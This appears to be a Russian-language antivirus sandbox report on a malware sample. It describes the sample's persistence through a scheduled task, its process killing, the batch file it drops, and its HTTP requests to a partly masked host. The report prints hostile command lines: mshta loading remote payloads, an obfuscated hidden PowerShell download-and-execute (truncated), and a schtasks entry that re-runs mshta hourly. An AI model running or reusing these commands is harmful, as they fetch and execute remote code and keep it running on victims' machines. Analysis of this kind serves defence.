Техническая информация
Для обеспечения автозапуска и распространения
Создает или изменяет следующие файлы
- <SYSTEM32>\tasks\microsoftcdt
Вредоносные функции
Запускает на исполнение
- '<SYSTEM32>\taskkill.exe' /f /im WINWORD.EXE
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\mshta.exe' http://om###ficer.com/cgi/pocazoi.mp3
Завершает или пытается завершить
следующие системные процессы:
- %WINDIR%\microsoft.net\framework\v4.0.30319\msbuild.exe
Изменения в файловой системе
Создает следующие файлы
- %APPDATA%\desktop.ini.bat
Сетевая активность
TCP
Запросы HTTP GET
- http://om###ficer.com/cgi/pocazoi.mp3
- http://om###ficer.com/cgi/asynk.jpg
- http://om###ficer.com/cgi/battarefa.jpg
- http://om###ficer.com/cgi/bat.mp3
UDP
- DNS ASK om###ficer.com
Другое
Ищет следующие окна
- ClassName: '' WindowName: ''
Создает и запускает на исполнение
- '<SYSTEM32>\mshta.exe' http://om###ficer.com/cgi/pocazoi.mp3' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -windowstyle hidden -noexit -executionpolicy bypass -command I`EX ((n`e`W`-Obj`E`c`T (('Net'+'.'+'Webc'+'lient'))).(('D'+'o'+'w'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c ""%APPDATA%\Desktop.ini.bat" "
- '<SYSTEM32>\schtasks.exe' /create /sc MINUTE /mo 60 /tn ""MicrosoftCDT"" /tr ""\""mshta\""http://om###ficer.com/cgi/msgbox.mp3"" /F
